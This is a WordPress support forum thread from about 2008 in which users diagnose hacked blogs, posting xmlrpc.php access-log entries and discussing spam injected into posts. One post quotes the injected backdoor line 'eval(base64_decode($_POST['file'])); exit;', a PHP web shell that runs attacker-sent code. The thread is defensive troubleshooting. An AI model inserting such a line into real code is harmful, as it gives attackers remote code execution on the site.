WordPress.org

Ready to get started?Download WordPress

Forums

Hacking Problem (16 posts)

  1. fattony69
    Member
    Posted 6 years ago #

    I have three blogs that I own. All of them are protected with the knowledge I have. .htaccess, encrypted password, etc...but I have been getting hacked lately. All of the sites are updated and I have check the plugins and all are updated and have no problems...so what is the caused?

  2. VRocKs
    Member
    Posted 6 years ago #

    I keep getting this:

    protected.com/logs/access.log:194.110.162.23 - - [24/Mar/2008:01:46:27 -0400] "POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1" 200 25 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    protected.com/logs/access.log:194.110.162.23 - - [24/Mar/2008:01:46:28 -0400] "POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1" 200 25 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:38:22 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "http://www.protected.com/page/3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
    protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:38:22 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "http://www.protected.com/page/3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
    protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:52:18 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "http://www.protected.com/page/images/protected.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
    protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:52:18 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "http://www.protected.com/page/images/protected.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
    protected.com/logs/access.log:78.151.173.179 - - [24/Mar/2008:05:51:43 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "http://www.protected.com/" "Dummy/1.00 (Windows NT 5.1; U; en-us)"
    protected.com/logs/access.log:78.151.173.179 - - [24/Mar/2008:05:51:46 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "http://www.protected.com/" "Dummy/1.00 (Windows NT 5.1; U; en-us)"
    protected.com/logs/access.log:77.91.224.14 - - [24/Mar/2008:06:00:23 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
    protected.com/logs/access.log:77.91.224.14 - - [24/Mar/2008:06:03:01 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"

  3. VRocKs
    Member
    Posted 6 years ago #

    Once that appears in my logs I have several files with code injected and all of my files are touched to the same date.

    http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/

    Good explanation...

    Google for:

    eval(base64_decode($_POST['file'])); exit;

    Apparently XMLRPC is hackable!

  4. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    VRocKs: There are no known exploits for WordPress 2.3.3. Are you running the latest version? Are you *SURE*?

    Furthermore, the log you posted is showing somebody running an exploit, not somebody installing one. That exploit could have been added to your site through any of half a dozen other ways.

    We need more information to confirm that this is a WordPress issue. Nothing you have given us confirms that or shows any sort of a clue on how you were hacked.

    In other words, telling us WordPress has a problem is useless to us unless you can also tell us where the problem is.

  5. whooami
    Member
    Posted 6 years ago #

    there is also no indication this is primarily w WP problem, and not something underlying.

    http://www.kidscoop.org/ is exploited and it's inside their gallery installation.

    http://www.larmac.com.au/ also popped up.

    http://www.lentini.co.uk is hacked. Ive emailed him; notice the old version?

    http://www.jtechnica.com is hacked, with the hqc.php bits, even. And its not a wordpress install.

    http://www.uneditedspirituality.ca/ is hacked with the hcq.php, and that's Joomla.

    http://www.spinlabs.ca/ is hacked and its an older version. Not real old, but still. And somehow, in a case of "hahah, you reap what you sow", this person has *apparantly* actively disabled the upgrade notices:

    http://www.spinlabs.ca/wp-content/plugins/disable-wordpress-core-update/

    http://jeremyduncan.ca/ is hacked, and the redirect to the spam content is able to be called right off his index.php page.

    http://www.hansdreesen.com/ = hacked.

    http://www.thinkerlabs.ca/jonmanafo is hacked. another old version; i emailed him.. no reply.

    Those are just a few of the sites that popped up in the $_POST logging i have set up on one site that I am watching. Oddly enough, even over the course of a few days, the IP never changed: 216.246.56.146

  6. VRocKs
    Member
    Posted 6 years ago #

    I setup a honeypot for them...

    I also put on an aluminum foil hat...

    I will let you know...

  7. w00t
    Member
    Posted 6 years ago #

    it does appear like a wordpress problem. I have been having this lately--for the past few weeks. Look here:

    http://mraziz.com/personal/2008/03/16/post-spam/

    this same post mentioned above is injected with spam, no matter how many times i edit the post and remove it it gets back, and comments are turned off too. I thought it was a problem with my host and I was hacked so I changed my host to a new one, same problem is happneing. I'm using 2.3.3 and I'm sure about it.

  8. Jeremy Clark
    Moderator
    Posted 6 years ago #

    Do you have any logs of how they're doing it.

  9. w00t
    Member
    Posted 6 years ago #

    which logs do you need? or which file?

  10. whooami
    Member
    Posted 6 years ago #

    I can tell you how theyre doing it. we saw it in the $_POST logging. Donncha was made aware of it as well.

    Theyre calling a file behind wp-admin/ It cannot be replicated unless you are logged in as an admin. Not logged in, then you are properly redirected to login. And a simple subscriber acct, if you are logged in as such, is told they dont have the necessary permissions.

    The consensus was either it was a cookie or a password thing.

    I am NOT sharing the file name, it serves no purpose for me to do so.

  11. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    Well, how are they logging in then? I mean, I could login to your blog as you if I could get ahold of your cookies, but I don't quite see how they're getting those.

  12. whooami
    Member
    Posted 6 years ago #

    that was Donncha's reaction, exactly, otto. Ive seen an attempted sql exploit that attempts to get the admin password but it fails on a wordpress 2.3.3 install, and as far as I could see, its old.

    There are 2 things going on.

    1. the wp-content/1 thing .. that attack is actually visible in your Apache logs. They use a core file behind wp-admin/ to create a rootshell on a file that already exists (that ought to give it away for you, otto)

    2. The insertions into actual posts. Thats yet another file behind wp-admin/

    Both of these require you to be logged in, the _noonce fails without a valid admin login.

    I have examples of both of those, if youre interested Otto. Just drop me an email.

  13. w00t
    Member
    Posted 6 years ago #

    So what shall I do to resolve this?

  14. whooami
    Member
    Posted 6 years ago #

    start by changing your admin password. If you changed it once, change it again. And I dont care what anyone says to the contrary, I would change the names of your cookies. Someone I helped mentioned seeing session variables inside on of their wordpress tables, I havent seen that anywhere though. If you see any, I would clear em.

    If you want to be a guinea pig and try to help figuring out the problem, send me an email and we can set up some logging. Its takes 2 minutes.

  15. w00t
    Member
    Posted 6 years ago #

    Anyway, if you as you say they are logging in as admin, why is it only happening to the most recent post only? If i were a spammer and I obtained admin access I would spam/alter all the posts and even mass post spam everywhere.

  16. whooami
    Member
    Posted 6 years ago #

    Anyway, if you as you say they are logging ...

    anyway?

    I could answer your question by showing you the $_POST variables, I'm not going to.

    I'll assume by your lack of reply to my offer that you arent interested in actually seeing all of this for yourself, which btw, would have negated the necessity for such a question. Therefore, I wish you the best, and you may consider my offer rescinded.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags